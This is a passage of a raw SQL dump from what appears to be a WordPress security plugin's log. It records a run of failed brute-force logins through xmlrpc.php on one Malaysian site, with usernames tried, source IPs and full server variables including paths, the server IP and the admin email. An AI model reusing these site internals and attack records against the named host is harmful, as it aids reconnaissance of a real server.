Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJrx90bn5mtr-PXqq5cgAAAEI\";s:12:\"REDIRECT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"198.71.239.24\";s:11:\"REMOTE_PORT\";s:5:\"42771\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJrx90bn5mtr-PXqq5cgAAAEI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853551.7831\";s:12:\"REQUEST_TIME\";s:10:\"1566853551\";}}','notice','2019-08-26 21:05:54','2019-08-26 21:05:52',18302944,19504616,'http://bintara.com.my/staging/xmlrpc.php',1,0,'198.71.239.24'),(23296,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/old/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"359\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/old/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/old/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJsRTEVi0fEJEHuDZccwAAAAE\";s:12:\"REDIRECT_URL\";s:15:\"/old/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"185.85.239.201\";s:11:\"REMOTE_PORT\";s:5:\"50695\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/old/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/old/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJsRTEVi0fEJEHuDZccwAAAAE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853553.6096\";s:12:\"REQUEST_TIME\";s:10:\"1566853553\";}}','notice','2019-08-26 21:05:55','2019-08-26 21:05:54',18304696,19506928,'http://bintara.com.my/old/xmlrpc.php',1,0,'185.85.239.201'),(23297,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/old/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/old/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/old/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJs4ir4pgxiIHnHK4qQAAAAcI\";s:12:\"REDIRECT_URL\";s:15:\"/old/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"198.71.238.8\";s:11:\"REMOTE_PORT\";s:5:\"60462\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/old/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:15:\"/old/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJs4ir4pgxiIHnHK4qQAAAAcI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853556.1044\";s:12:\"REQUEST_TIME\";s:10:\"1566853556\";}}','notice','2019-08-26 21:05:59','2019-08-26 21:05:56',18313960,19506576,'http://bintara.com.my/old/xmlrpc.php',1,0,'198.71.238.8'),(23298,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/newsite/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/newsite/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/newsite/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJtR90bn5mtr-PXqq5cwAAAFQ\";s:12:\"REDIRECT_URL\";s:19:\"/newsite/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.194.169\";s:11:\"REMOTE_PORT\";s:5:\"57386\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/newsite/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/newsite/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJtR90bn5mtr-PXqq5cwAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853557.2105\";s:12:\"REQUEST_TIME\";s:10:\"1566853557\";}}','notice','2019-08-26 21:06:00','2019-08-26 21:05:57',18301320,19503112,'http://bintara.com.my/newsite/xmlrpc.php',1,0,'50.63.194.169'),(23299,0,'brute_force','invalid-login::username-bintara.com.my','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:14:\"bintara.com.my\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/staging/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"355\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJvBTEVi0fEJEHuDZcdwAAAAQ\";s:12:\"REDIRECT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"148.72.232.133\";s:11:\"REMOTE_PORT\";s:5:\"49293\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/staging/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:19:\"/staging/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJvBTEVi0fEJEHuDZcdwAAAAQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853564.4853\";s:12:\"REQUEST_TIME\";s:10:\"1566853564\";}}','notice','2019-08-26 21:06:06','2019-08-26 21:06:04',18306216,19507944,'http://bintara.com.my/staging/xmlrpc.php',1,0,'148.72.232.133'),(23300,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/portal/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJvxTEVi0fEJEHuDZceQAAAAU\";s:12:\"REDIRECT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"184.154.95.153\";s:11:\"REMOTE_PORT\";s:5:\"59400\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJvxTEVi0fEJEHuDZceQAAAAU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566853567.581\";s:12:\"REQUEST_TIME\";s:10:\"1566853567\";}}','notice','2019-08-26 21:06:09','2019-08-26 21:06:07',18304176,19506936,'http://bintara.com.my/portal/xmlrpc.php',1,0,'184.154.95.153'),(23301,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/portal/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJwR90bn5mtr-PXqq5dwAAAEQ\";s:12:\"REDIRECT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"103.233.187.1\";s:11:\"REMOTE_PORT\";s:5:\"47542\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJwR90bn5mtr-PXqq5dwAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853569.7053\";s:12:\"REQUEST_TIME\";s:10:\"1566853569\";}}','notice','2019-08-26 21:06:11','2019-08-26 21:06:10',18304880,19505008,'http://bintara.com.my/portal/xmlrpc.php',1,0,'103.233.187.1'),(23302,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your password</a>?\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/portal/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"341\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_ACCEPT_CHARSET\";s:30:\"utf-8,ISO-8859-2;q=0.8,*;q=0.7\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:20:\"en-us;q=0.7,en;q=0.3\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XWRJwxTEVi0fEJEHuDZcfAAAAAA\";s:12:\"REDIRECT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"46.32.240.35\";s:11:\"REMOTE_PORT\";s:5:\"44082\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:39:\"http://bintara.com.my/portal/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:18:\"/portal/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWRJwxTEVi0fEJEHuDZcfAAAAAA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566853571.5699\";s:12:\"REQUEST_TIME\";s:10:\"1566853571\";}}','notice','2019-08-26 21:06:13','2019-08-26 21:06:11',18303664,19505240,'http://bintara.com.my/portal/xmlrpc.php',1,0,'46.32.240.35'),(23303,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:18:\"incorrect_password\";a:1:{i:0;s:196:\"<strong>ERROR</strong>: The username or password you entered is incorrect. <a href=\"https://bintara.com.my/wp-login.php?action=lostpassword\" title=\"Password Lost and Found\">Lost your 